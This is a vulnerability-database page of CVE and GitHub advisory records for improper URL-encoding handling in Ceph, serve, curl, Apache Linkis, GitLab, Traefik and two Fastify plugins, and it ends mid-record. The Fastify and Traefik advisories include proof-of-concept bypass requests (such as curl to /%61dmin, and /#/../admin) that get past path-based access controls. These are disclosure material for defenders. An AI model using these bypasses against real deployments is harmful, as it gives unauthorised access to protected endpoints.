Common Weakness Enumeration

CWE-177

Allowed

Improper Handling of URL Encoding (Hex Encoding)

Abstraction: Variant · Status: Draft

The product does not properly handle when all or part of an input has been URL encoded.

28 vulnerabilities reference this CWE, most recent first.

CVE-2022-3854 (GCVE-0-2022-3854)

Vulnerability from cvelistv5 – Published: 2023-03-06 00:00 – Updated: 2025-03-06 18:54
VLAI
Summary
A flaw was found in Ceph, relating to the URL processing on RGW backends. An attacker can exploit the URL processing by providing a null URL to crash the RGW, causing a denial of service.
SSVC
Exploitation: none Automatable: no Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
Assigner
References
Impacted products
Vendor Product Version
n/a ceph Affected: As shipped with Red Hat Ceph 3, 4, and 5.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:20:58.403Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139925"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 6.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "REQUIRED",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2022-3854",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-03-06T18:53:45.523579Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-03-06T18:54:06.925Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ceph",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "As shipped with Red Hat Ceph 3, 4, and 5."
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A flaw was found in Ceph, relating to the URL processing on RGW backends. An attacker can exploit the URL processing by providing a null URL to crash the RGW, causing a denial of service."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-177",
              "description": "CWE-177",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-03-06T00:00:00.000Z",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139925"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2022-3854",
    "datePublished": "2023-03-06T00:00:00.000Z",
    "dateReserved": "2022-11-03T00:00:00.000Z",
    "dateUpdated": "2025-03-06T18:54:06.925Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2018-3718 (GCVE-0-2018-3718)

Vulnerability from cvelistv5 – Published: 2018-06-07 02:00 – Updated: 2024-09-16 20:36
VLAI
Summary
serve node module suffers from Improper Handling of URL Encoding by permitting access to ignored files if a filename is URL encoded.
Severity
No CVSS data available.
CWE
  • CWE-177 - Improper Handling of URL Encoding (Hex Encoding) (CWE-177)
Assigner
References
URL Tags
https://hackerone.com/reports/308721 x_refsource_MISC
Impacted products
Vendor Product Version
HackerOne serve node module Affected: All versions
Create a notification for this product.
Date Public
2018-04-26 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T04:50:30.645Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://hackerone.com/reports/308721"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "serve node module",
          "vendor": "HackerOne",
          "versions": [
            {
              "status": "affected",
              "version": "All versions"
            }
          ]
        }
      ],
      "datePublic": "2018-04-26T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "serve node module suffers from Improper Handling of URL Encoding by permitting access to ignored files if a filename is URL encoded."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-177",
              "description": "Improper Handling of URL Encoding (Hex Encoding) (CWE-177)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-06-07T01:57:01.000Z",
        "orgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1",
        "shortName": "hackerone"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://hackerone.com/reports/308721"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "support@hackerone.com",
          "DATE_PUBLIC": "2018-04-26T00:00:00",
          "ID": "CVE-2018-3718",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "serve node module",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "HackerOne"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "serve node module suffers from Improper Handling of URL Encoding by permitting access to ignored files if a filename is URL encoded."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Improper Handling of URL Encoding (Hex Encoding) (CWE-177)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://hackerone.com/reports/308721",
              "refsource": "MISC",
              "url": "https://hackerone.com/reports/308721"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1",
    "assignerShortName": "hackerone",
    "cveId": "CVE-2018-3718",
    "datePublished": "2018-06-07T02:00:00.000Z",
    "dateReserved": "2017-12-28T00:00:00.000Z",
    "dateUpdated": "2024-09-16T20:36:21.693Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

GHSA-5RC4-8QQH-VQ7F

Vulnerability from github – Published: 2021-08-09 22:24 – Updated: 2023-09-12 20:58
VLAI
Summary
vercel/serve allows access to restricted files if filename is URL encoded.
Details

serve node module suffers from Improper Handling of URL Encoding by permitting access to ignored files if a filename is URL encoded.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "serve"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.5.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2018-3718"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-177"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-08-09T22:24:10Z",
    "nvd_published_at": "2018-06-07T02:29:00Z",
    "severity": "MODERATE"
  },
  "details": "serve node module suffers from Improper Handling of URL Encoding by permitting access to ignored files if a filename is URL encoded.",
  "id": "GHSA-5rc4-8qqh-vq7f",
  "modified": "2023-09-12T20:58:59Z",
  "published": "2021-08-09T22:24:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-3718"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/308721"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vercel/serve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vercel/serve allows access to restricted files if filename is URL encoded."
}

GHSA-82RV-H33P-2XGC

Vulnerability from github – Published: 2022-06-03 00:01 – Updated: 2024-03-27 15:30
VLAI
Details

The curl URL parser wrongly accepts percent-encoded URL separators like '/'when decoding the host name part of a URL, making it a different URL usingthe wrong host name when it is later retrieved.For example, a URL like http://example.com%2F127.0.0.1/, would be allowed bythe parser and get transposed into http://example.com/127.0.0.1/. This flawcan be used to circumvent filters, checks and more.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-27780"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-177",
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-06-02T14:15:00Z",
    "severity": "HIGH"
  },
  "details": "The curl URL parser wrongly accepts percent-encoded URL separators like \u0027/\u0027when decoding the host name part of a URL, making it a *different* URL usingthe wrong host name when it is later retrieved.For example, a URL like `http://example.com%2F127.0.0.1/`, would be allowed bythe parser and get transposed into `http://example.com/127.0.0.1/`. This flawcan be used to circumvent filters, checks and more.",
  "id": "GHSA-82rv-h33p-2xgc",
  "modified": "2024-03-27T15:30:35Z",
  "published": "2022-06-03T00:01:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27780"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/1553841"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202212-01"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20220609-0009"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C399-Q49H-QWC8

Vulnerability from github – Published: 2026-01-19 09:30 – Updated: 2026-01-21 01:03
VLAI
Summary
Apache Linkis: Arbitrary File Read via Double URL Encoding Bypass
Details

A vulnerability in Apache Linkis.

Problem Description

When using the JDBC engine and data source functionality, if the URL parameter configured on the frontend has undergone multiple rounds of URL encoding, it may bypass the system's checks. This bypass can trigger a vulnerability that allows unauthorized access to system files via JDBC parameters.

Scope of Impact

This issue affects Apache Linkis: from 1.3.0 through 1.7.0.

Severity level

moderate Solution Continuously check if the connection information contains the "%" character; if it does, perform URL decoding.

Users are recommended to upgrade to version 1.8.0, which fixes the issue.

More questions about this vulnerability can be discussed here:  https://lists.apache.org/list?dev@linkis.apache.org:2025-9:cve

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.linkis:linkis"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.3.0"
            },
            {
              "fixed": "1.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-29847"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-177",
      "CWE-20"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-21T01:03:19Z",
    "nvd_published_at": "2026-01-19T09:16:01Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in Apache Linkis.\n\nProblem Description\n\nWhen using the JDBC engine and data source functionality, if the URL parameter configured on the frontend has undergone multiple rounds of URL encoding, it may bypass the system\u0027s checks. This bypass can trigger a vulnerability that allows unauthorized access to system files via JDBC parameters.\n\nScope of Impact\n\n\nThis issue affects Apache Linkis: from 1.3.0 through 1.7.0.\n\nSeverity level\n\n\nmoderate\nSolution\nContinuously check if the connection information contains the \"%\" character; if it does, perform URL decoding.\n\nUsers are recommended to upgrade to version 1.8.0, which fixes the issue.\n\n\n\n\nMore questions about this vulnerability can be discussed here:\u00a0 https://lists.apache.org/list?dev@linkis.apache.org:2025-9:cve",
  "id": "GHSA-c399-q49h-qwc8",
  "modified": "2026-01-21T01:03:19Z",
  "published": "2026-01-19T09:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29847"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/linkis"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/list?dev@linkis.apache.org:2025-9:cve"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/03l5rfkgdt022o75jp8x4tzpqxz8g057"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/09/19/2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Apache Linkis: Arbitrary File Read via Double URL Encoding Bypass"
}

GHSA-CF8F-2F35-R5WX

Vulnerability from github – Published: 2025-11-15 09:30 – Updated: 2025-11-15 09:30
VLAI
Details

GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.4.4, and 18.5 before 18.5.2 that could have allowed an authenticated user to gain CSRF tokens by exploiting improper input validation in repository references combined with redirect handling weaknesses.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-11990"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-177",
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-15T08:15:45Z",
    "severity": "LOW"
  },
  "details": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.4.4, and 18.5 before 18.5.2 that could have allowed an authenticated user to gain CSRF tokens by exploiting improper input validation in repository references combined with redirect handling weaknesses.",
  "id": "GHSA-cf8f-2f35-r5wx",
  "modified": "2025-11-15T09:30:25Z",
  "published": "2025-11-15T09:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11990"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/3257843"
    },
    {
      "type": "WEB",
      "url": "https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/577850"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CXRG-G7R8-W69P

Vulnerability from github – Published: 2026-01-20 16:34 – Updated: 2026-01-20 16:34
VLAI
Summary
Fastify Middie Middleware Path Bypass
Details

Summary

A security vulnerability exists in @fastify/middie where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., /%61dmin instead of /admin). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints.

Details

The vulnerability is caused by how middie matches requests against registered middleware paths.

  1. Regex Generation: When fastify.use('/admin', ...) is called, middie uses path-to-regexp to generate a regular expression for the path /admin.
  2. Request Matching: For every request, middie executes this regular expression against req.url (or req.originalUrl).
  3. The Flaw: req.url in Fastify contains the raw, undecoded path string.
    • The generated regex expects a decoded path (e.g., /admin).
    • If a request is sent to /%61dmin, the regex comparison fails (/^\/admin/ does not match /%61dmin).
    • middie assumes the middleware does not apply and calls next().
  4. Route Execution: The request proceeds to Fastify's internal router, which performs URL decoding. It correctly identifies /%61dmin as /admin and executes the corresponding route handler.

Incriminated Source Code: In the provided middie source:

// ... inside Holder function
if (regexp) {
  const result = regexp.exec(url) // <--- 'url' is undecoded.
  if (result) {
    // ... executes middleware ...
  } else {
    that.done() // <--- Middleware skipped on mismatch
  }
}

PoC

Step 1: Run the following Fastify application (save as app.js):

const fastify = require('fastify')({ logger: true });

async function start() {
  // Register middie for Express-style middleware support
  await fastify.register(require('@fastify/middie'));

  // Middleware to block /admin route
  fastify.use('/admin', (req, res, next) => {
    res.statusCode = 403;
    res.end('Forbidden: Access to /admin is blocked');
  });

  // Sample routes
  fastify.get('/', async (request, reply) => {
    return { message: 'Welcome to the homepage' };
  });

  fastify.get('/admin', async (request, reply) => {
    return { message: 'Admin panel' };
  });

  // Start server
  try {
    await fastify.listen({ port: 3008 });
  } catch (err) {
    fastify.log.error(err);
    process.exit(1);
  }
}

start();

Step 2: Execute the attack. 1. Normal Request (Blocked): bash curl http://localhost:3008/admin # Output: Forbidden: Access to /admin is blocked 2. Bypass Request (Successful): bash curl http://localhost:3008/%61dmin # Output: {"message":"Admin panel"}

Impact

  • Type: Authentication/Authorization Bypass.
  • Affected Components: Applications using @fastify/middie to apply security controls (auth, rate limiting, IP filtering) to specific route prefixes.
  • Severity: High. Attackers can trivially bypass critical security middleware to access protected administrative or sensitive endpoints.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 9.0.3"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@fastify/middie"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "9.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22031"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-177"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-20T16:34:50Z",
    "nvd_published_at": "2026-01-19T16:15:54Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA security vulnerability exists in `@fastify/middie` where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., `/%61dmin` instead of `/admin`). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints.\n\n### Details\nThe vulnerability is caused by how `middie` matches requests against registered middleware paths.\n\n1.  **Regex Generation**: When [fastify.use(\u0027/admin\u0027, ...)](cci:1://file:///Users/harshjaiswal/work/research/nest/packages/platform-fastify/adapters/fastify-adapter.ts:733:2-741:3) is called, `middie` uses `path-to-regexp` to generate a regular expression for the path `/admin`.\n2.  **Request Matching**: For every request, `middie` executes this regular expression against `req.url` (or `req.originalUrl`).\n3.  **The Flaw**: `req.url` in Fastify contains the **raw, undecoded** path string.\n    *   The generated regex expects a decoded path (e.g., `/admin`).\n    *   If a request is sent to `/%61dmin`, the regex comparison fails (`/^\\/admin/` does not match `/%61dmin`).\n    *   `middie` assumes the middleware does not apply and calls `next()`.\n4.  **Route Execution**: The request proceeds to Fastify\u0027s internal router, which performs URL decoding. It correctly identifies `/%61dmin` as `/admin` and executes the corresponding route handler.\n\n**Incriminated Source Code:**\nIn the provided `middie` source:\n```javascript\n// ... inside Holder function\nif (regexp) {\n  const result = regexp.exec(url) // \u003c--- \u0027url\u0027 is undecoded.\n  if (result) {\n    // ... executes middleware ...\n  } else {\n    that.done() // \u003c--- Middleware skipped on mismatch\n  }\n}\n```\n\n### PoC\n**Step 1:** Run the following Fastify application (save as `app.js`):\n```javascript\nconst fastify = require(\u0027fastify\u0027)({ logger: true });\n\nasync function start() {\n  // Register middie for Express-style middleware support\n  await fastify.register(require(\u0027@fastify/middie\u0027));\n\n  // Middleware to block /admin route\n  fastify.use(\u0027/admin\u0027, (req, res, next) =\u003e {\n    res.statusCode = 403;\n    res.end(\u0027Forbidden: Access to /admin is blocked\u0027);\n  });\n\n  // Sample routes\n  fastify.get(\u0027/\u0027, async (request, reply) =\u003e {\n    return { message: \u0027Welcome to the homepage\u0027 };\n  });\n\n  fastify.get(\u0027/admin\u0027, async (request, reply) =\u003e {\n    return { message: \u0027Admin panel\u0027 };\n  });\n\n  // Start server\n  try {\n    await fastify.listen({ port: 3008 });\n  } catch (err) {\n    fastify.log.error(err);\n    process.exit(1);\n  }\n}\n\nstart();\n```\n\n**Step 2:** Execute the attack.\n1.  **Normal Request (Blocked):**\n    ```bash\n    curl http://localhost:3008/admin\n    # Output: Forbidden: Access to /admin is blocked\n    ```\n2.  **Bypass Request (Successful):**\n    ```bash\n    curl http://localhost:3008/%61dmin\n    # Output: {\"message\":\"Admin panel\"}\n    ```\n\n### Impact\n*   **Type:** Authentication/Authorization Bypass.\n*   **Affected Components:** Applications using `@fastify/middie` to apply security controls (auth, rate limiting, IP filtering) to specific route prefixes.\n*   **Severity:** High. Attackers can trivially bypass critical security middleware to access protected administrative or sensitive endpoints.",
  "id": "GHSA-cxrg-g7r8-w69p",
  "modified": "2026-01-20T16:34:50Z",
  "published": "2026-01-20T16:34:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fastify/middie/security/advisories/GHSA-cxrg-g7r8-w69p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22031"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fastify/middie/pull/245"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fastify/middie/commit/d44cd56eb724490babf7b452fdbbdd37ea2effba"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fastify/middie"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fastify/middie/releases/tag/v9.1.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Fastify Middie Middleware Path Bypass"
}

GHSA-FVHJ-4QFH-Q2HM

Vulnerability from github – Published: 2023-12-05 18:11 – Updated: 2023-12-07 23:06
VLAI
Summary
Traefik incorrectly processes fragment in the URL, leads to Authorization Bypass
Details

Summary

When a request is sent to Traefik with a URL fragment, Traefik automatically URL encodes and forwards the fragment to the backend server. This violates the RFC because in the origin-form the URL should only contain the absolute path and the query.

When this is combined with another frontend proxy like Nginx, it can be used to bypass frontend proxy URI-based access control restrictions.

Details

For example, we have this Nginx configuration:

location /admin {
     deny all;
     return 403;
}

This can be bypassed when the attacker is requesting to /#/../admin

This won’t be vulnerable if the backend server follows the RFC and ignores any characters after the fragment.

However, if Nginx is chained with another reverse proxy which automatically URL encode the character # (Traefik) the URL will become

/%23/../admin

And allow the attacker to completely bypass the Access Restriction from the Nginx Front-End proxy.

Here is a diagram to summarize the attack:

image

PoC

image (1)

This is the POC docker I've set up. It contains Nginx, Traefik proxies and a backend server running PHP.

https://drive.google.com/file/d/1vLnA0g7N7ZKhLNmHmuJ4JJjV_J2akNMt/view?usp=sharing

Impact

This allows the attacker to completely bypass the Access Restriction from Front-End proxy.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.10.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.0-beta5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-47106"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-177",
      "CWE-20"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-12-05T18:11:48Z",
    "nvd_published_at": "2023-12-04T21:15:33Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nWhen a request is sent to Traefik with a URL fragment, Traefik automatically URL encodes and forwards the fragment to the backend server. This violates the RFC because in the origin-form the URL should only contain the absolute path and the query.\n\nWhen this is combined with another frontend proxy like Nginx, it can be used to bypass frontend proxy URI-based access control\nrestrictions. \n\n### Details\nFor example, we have this Nginx configuration:\n\n```\nlocation /admin {\n     deny all;\n     return 403;\n}\n```\nThis can be bypassed when the attacker is requesting to /#/../admin\n\nThis won\u2019t be vulnerable if the backend server follows the RFC and ignores any characters after the fragment.\n\nHowever, if Nginx is chained with another reverse proxy which automatically URL encode the character # (Traefik) the URL will become\n\n/%23/../admin\n\nAnd allow the attacker to completely bypass the Access Restriction from the Nginx Front-End proxy.\n\nHere is a diagram to summarize the attack:\n\n![image](https://user-images.githubusercontent.com/47447167/278849578-34ca0546-99b4-44c8-8fc8-8e799c1f5069.png)\n\n### PoC\n![image (1)](https://user-images.githubusercontent.com/47447167/278849597-280f2e80-f2d7-4dd9-9662-b8f488fd5ff2.png)\n\nThis is the POC docker I\u0027ve set up.  It contains Nginx, Traefik proxies and a backend server running PHP.\n\nhttps://drive.google.com/file/d/1vLnA0g7N7ZKhLNmHmuJ4JJjV_J2akNMt/view?usp=sharing\n\n### Impact\nThis allows the attacker to completely bypass the Access Restriction from Front-End proxy.",
  "id": "GHSA-fvhj-4qfh-q2hm",
  "modified": "2023-12-07T23:06:09Z",
  "published": "2023-12-05T18:11:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-fvhj-4qfh-q2hm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47106"
    },
    {
      "type": "WEB",
      "url": "https://datatracker.ietf.org/doc/html/rfc7230#section-5.3.1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/traefik/traefik"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.10.6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.0.0-beta5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Traefik incorrectly processes fragment in the URL, leads to Authorization Bypass"
}

GHSA-G6Q3-96CP-5R5M

Vulnerability from github – Published: 2026-01-20 16:35 – Updated: 2026-01-20 16:35
VLAI
Summary
@fastify/express vulnerable to Improper Handling of URL Encoding (Hex Encoding)
Details

Summary

A security vulnerability exists in @fastify/express where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., /%61dmin instead of /admin). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints.

Details

The vulnerability is caused by how @fastify/express matches requests against registered middleware paths.

PoC

Step 1: Run the following Fastify application (save as app.js):

const fastify = require('fastify')({ logger: true });

async function start() {
  // Register fastify-express for Express-style middleware support
  await fastify.register(require('@fastify/express'));

  // Middleware to block /admin route
  fastify.use('/admin', (req, res, next) => {
    res.statusCode = 403;
    res.end('Forbidden: Access to /admin is blocked');
  });

  // Sample routes
  fastify.get('/', async (request, reply) => {
    return { message: 'Welcome to the homepage' };
  });

  fastify.get('/admin', async (request, reply) => {
    return { message: 'Admin panel' };
  });

  fastify.get('/admin/dashboard', async (request, reply) => {
    return { message: 'Admin dashboard' };
  });

  // Start server
  try {
    await fastify.listen({ port: 3000 });
  } catch (err) {
    fastify.log.error(err);
    process.exit(1);
  }
}

start();

Step 2: Execute the attack.

➜  ~ curl http://206.189.140.29:3000/%61dmin
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot GET /%61dmin</pre>
</body>
</html>

(fastify express)

➜  ~ curl http://206.189.140.29:3000/%61dmin
{"message":"Admin panel"}

It differs from CVE-2026-22031 because this is a different npm module with its own code.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.0.2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@fastify/express"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22037"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-177",
      "CWE-288"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-20T16:35:21Z",
    "nvd_published_at": "2026-01-19T17:15:50Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA security vulnerability exists in `@fastify/express` where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., `/%61dmin` instead of `/admin`). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints.\n\n### Details\nThe vulnerability is caused by how `@fastify/express` matches requests against registered middleware paths.\n\n### PoC\n**Step 1:** Run the following Fastify application (save as `app.js`):\n\n```javascript\nconst fastify = require(\u0027fastify\u0027)({ logger: true });\n\nasync function start() {\n  // Register fastify-express for Express-style middleware support\n  await fastify.register(require(\u0027@fastify/express\u0027));\n\n  // Middleware to block /admin route\n  fastify.use(\u0027/admin\u0027, (req, res, next) =\u003e {\n    res.statusCode = 403;\n    res.end(\u0027Forbidden: Access to /admin is blocked\u0027);\n  });\n\n  // Sample routes\n  fastify.get(\u0027/\u0027, async (request, reply) =\u003e {\n    return { message: \u0027Welcome to the homepage\u0027 };\n  });\n\n  fastify.get(\u0027/admin\u0027, async (request, reply) =\u003e {\n    return { message: \u0027Admin panel\u0027 };\n  });\n\n  fastify.get(\u0027/admin/dashboard\u0027, async (request, reply) =\u003e {\n    return { message: \u0027Admin dashboard\u0027 };\n  });\n\n  // Start server\n  try {\n    await fastify.listen({ port: 3000 });\n  } catch (err) {\n    fastify.log.error(err);\n    